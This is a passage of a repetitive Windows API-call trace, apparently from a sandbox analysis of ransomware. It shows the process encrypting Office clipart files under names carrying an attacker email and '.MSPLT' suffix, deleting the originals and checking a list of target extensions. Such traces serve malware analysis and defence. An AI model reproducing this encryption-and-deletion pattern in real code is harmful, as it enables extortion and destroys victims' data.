(lpString="AN01545_.WMF") returned 12 [0293.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01545_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0293.228] GetFileSizeEx (in: hFile=0x43c, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=7372) returned 1 [0293.228] CloseHandle (hObject=0x43c) returned 1 [0293.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01545_.wmf")) returned 0x220 [0293.229] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01545_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0293.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01545_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0293.229] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.229] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01545_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x48c [0293.231] GetLastError () returned 0x0 [0293.231] ReadFile (in: hFile=0x43c, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x1ccc, lpOverlapped=0x0) returned 1 [0293.241] WriteFile (in: hFile=0x48c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x1cd0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x1cd0, lpOverlapped=0x0) returned 1 [0293.243] ReadFile (in: hFile=0x43c, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0293.243] WriteFile (in: hFile=0x48c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0293.243] SetEndOfFile (hFile=0x48c) returned 1 [0293.244] CloseHandle (hObject=0x48c) returned 1 [0293.248] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.248] SetEndOfFile (hFile=0x43c) returned 1 [0293.268] CloseHandle (hObject=0x43c) returned 1 [0293.268] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0293.269] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01545_.wmf")) returned 1 [0293.270] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 68 [0293.270] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 68 [0293.270] lstrlenW (lpString=".doc") returned 4 [0293.270] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0293.270] lstrlenW (lpString=".docx") returned 5 [0293.270] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0293.270] lstrlenW (lpString=".pdf") returned 4 [0293.270] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0293.270] lstrlenW (lpString=".xls") returned 4 [0293.270] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0293.271] lstrlenW (lpString=".xlsx") returned 5 [0293.271] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0293.271] lstrlenW (lpString=".ppt") returned 4 [0293.271] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0293.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 68 [0293.271] lstrlenW (lpString=".zip") returned 4 [0293.271] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0293.271] lstrlenW (lpString=".rar") returned 4 [0293.271] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0293.271] lstrlenW (lpString=".bz2") returned 4 [0293.271] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0293.271] lstrlenW (lpString=".7z") returned 3 [0293.271] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0293.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 68 [0293.271] lstrlenW (lpString=".dbf") returned 4 [0293.271] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0293.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 68 [0293.271] lstrlenW (lpString=".1cd") returned 4 [0293.271] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0293.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 68 [0293.271] lstrlenW (lpString=".jpg") returned 4 [0293.271] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0293.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 68 [0293.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 68 [0293.271] lstrlenW (lpString=".doc") returned 4 [0293.272] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0293.272] lstrlenW (lpString=".docx") returned 5 [0293.272] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0293.272] lstrlenW (lpString=".pdf") returned 4 [0293.272] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0293.272] lstrlenW (lpString=".xls") returned 4 [0293.272] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0293.272] lstrlenW (lpString=".xlsx") returned 5 [0293.272] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0293.272] lstrlenW (lpString=".ppt") returned 4 [0293.272] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0293.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 68 [0293.272] lstrlenW (lpString=".zip") returned 4 [0293.272] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0293.272] lstrlenW (lpString=".rar") returned 4 [0293.272] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0293.272] lstrlenW (lpString=".bz2") returned 4 [0293.272] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0293.272] lstrlenW (lpString=".7z") returned 3 [0293.272] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0293.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 68 [0293.272] lstrlenW (lpString=".dbf") returned 4 [0293.272] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0293.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 68 [0293.272] lstrlenW (lpString=".1cd") returned 4 [0293.273] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0293.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 68 [0293.273] lstrlenW (lpString=".jpg") returned 4 [0293.273] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0293.273] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0293.273] lstrlenW (lpString="AN02122_.WMF") returned 12 [0293.273] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0293.447] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=7540) returned 1 [0293.447] CloseHandle (hObject=0x454) returned 1 [0293.447] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf")) returned 0x220 [0293.448] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0293.449] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0293.449] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.449] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0293.450] GetLastError () returned 0x0 [0293.450] ReadFile (in: hFile=0x454, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x1d74, lpOverlapped=0x0) returned 1 [0293.609] WriteFile (in: hFile=0x37c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x1d80, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x1d80, lpOverlapped=0x0) returned 1 [0293.610] ReadFile (in: hFile=0x454, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0293.610] WriteFile (in: hFile=0x37c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0293.610] SetEndOfFile (hFile=0x37c) returned 1 [0293.610] CloseHandle (hObject=0x37c) returned 1 [0293.614] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.614] SetEndOfFile (hFile=0x454) returned 1 [0294.476] CloseHandle (hObject=0x454) returned 1 [0294.476] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0294.481] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf")) returned 1 [0294.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0294.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0294.481] lstrlenW (lpString=".doc") returned 4 [0294.481] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.481] lstrlenW (lpString=".docx") returned 5 [0294.481] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.481] lstrlenW (lpString=".pdf") returned 4 [0294.481] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.482] lstrlenW (lpString=".xls") returned 4 [0294.482] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.482] lstrlenW (lpString=".xlsx") returned 5 [0294.482] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.482] lstrlenW (lpString=".ppt") returned 4 [0294.482] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0294.482] lstrlenW (lpString=".zip") returned 4 [0294.482] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.482] lstrlenW (lpString=".rar") returned 4 [0294.482] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.482] lstrlenW (lpString=".bz2") returned 4 [0294.482] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.482] lstrlenW (lpString=".7z") returned 3 [0294.482] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0294.482] lstrlenW (lpString=".dbf") returned 4 [0294.482] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0294.482] lstrlenW (lpString=".1cd") returned 4 [0294.482] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0294.482] lstrlenW (lpString=".jpg") returned 4 [0294.482] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0294.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0294.482] lstrlenW (lpString=".doc") returned 4 [0294.482] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.482] lstrlenW (lpString=".docx") returned 5 [0294.482] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.482] lstrlenW (lpString=".pdf") returned 4 [0294.483] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.483] lstrlenW (lpString=".xls") returned 4 [0294.483] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.483] lstrlenW (lpString=".xlsx") returned 5 [0294.483] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.483] lstrlenW (lpString=".ppt") returned 4 [0294.483] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0294.483] lstrlenW (lpString=".zip") returned 4 [0294.483] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.483] lstrlenW (lpString=".rar") returned 4 [0294.483] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.483] lstrlenW (lpString=".bz2") returned 4 [0294.483] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.483] lstrlenW (lpString=".7z") returned 3 [0294.483] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0294.483] lstrlenW (lpString=".dbf") returned 4 [0294.483] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0294.483] lstrlenW (lpString=".1cd") returned 4 [0294.483] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0294.483] lstrlenW (lpString=".jpg") returned 4 [0294.483] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.483] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0294.483] lstrlenW (lpString="AN04225_.WMF") returned 12 [0294.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0294.485] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=8492) returned 1 [0294.486] CloseHandle (hObject=0x454) returned 1 [0294.486] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf")) returned 0x220 [0294.486] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0294.486] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.486] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0294.487] GetLastError () returned 0x0 [0294.487] ReadFile (in: hFile=0x454, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x212c, lpOverlapped=0x0) returned 1 [0294.489] WriteFile (in: hFile=0x4c0, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x2130, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x2130, lpOverlapped=0x0) returned 1 [0294.490] ReadFile (in: hFile=0x454, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0294.490] WriteFile (in: hFile=0x4c0, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0294.490] SetEndOfFile (hFile=0x4c0) returned 1 [0294.490] CloseHandle (hObject=0x4c0) returned 1 [0294.496] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.496] SetEndOfFile (hFile=0x454) returned 1 [0294.502] CloseHandle (hObject=0x454) returned 1 [0294.503] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0294.503] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf")) returned 1 [0294.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0294.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0294.504] lstrlenW (lpString=".doc") returned 4 [0294.504] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.504] lstrlenW (lpString=".docx") returned 5 [0294.504] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.504] lstrlenW (lpString=".pdf") returned 4 [0294.504] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.504] lstrlenW (lpString=".xls") returned 4 [0294.505] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.505] lstrlenW (lpString=".xlsx") returned 5 [0294.505] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.505] lstrlenW (lpString=".ppt") returned 4 [0294.505] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0294.505] lstrlenW (lpString=".zip") returned 4 [0294.505] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.505] lstrlenW (lpString=".rar") returned 4 [0294.505] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.505] lstrlenW (lpString=".bz2") returned 4 [0294.505] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.505] lstrlenW (lpString=".7z") returned 3 [0294.505] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0294.505] lstrlenW (lpString=".dbf") returned 4 [0294.505] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0294.505] lstrlenW (lpString=".1cd") returned 4 [0294.505] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0294.505] lstrlenW (lpString=".jpg") returned 4 [0294.505] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0294.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0294.506] lstrlenW (lpString=".doc") returned 4 [0294.506] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.506] lstrlenW (lpString=".docx") returned 5 [0294.506] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.506] lstrlenW (lpString=".pdf") returned 4 [0294.506] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.506] lstrlenW (lpString=".xls") returned 4 [0294.506] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.506] lstrlenW (lpString=".xlsx") returned 5 [0294.506] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.506] lstrlenW (lpString=".ppt") returned 4 [0294.506] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0294.506] lstrlenW (lpString=".zip") returned 4 [0294.506] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.506] lstrlenW (lpString=".rar") returned 4 [0294.506] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.506] lstrlenW (lpString=".bz2") returned 4 [0294.506] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.506] lstrlenW (lpString=".7z") returned 3 [0294.506] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0294.506] lstrlenW (lpString=".dbf") returned 4 [0294.506] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0294.507] lstrlenW (lpString=".1cd") returned 4 [0294.507] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 68 [0294.507] lstrlenW (lpString=".jpg") returned 4 [0294.507] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.507] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0294.507] lstrlenW (lpString="AN04235_.WMF") returned 12 [0294.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 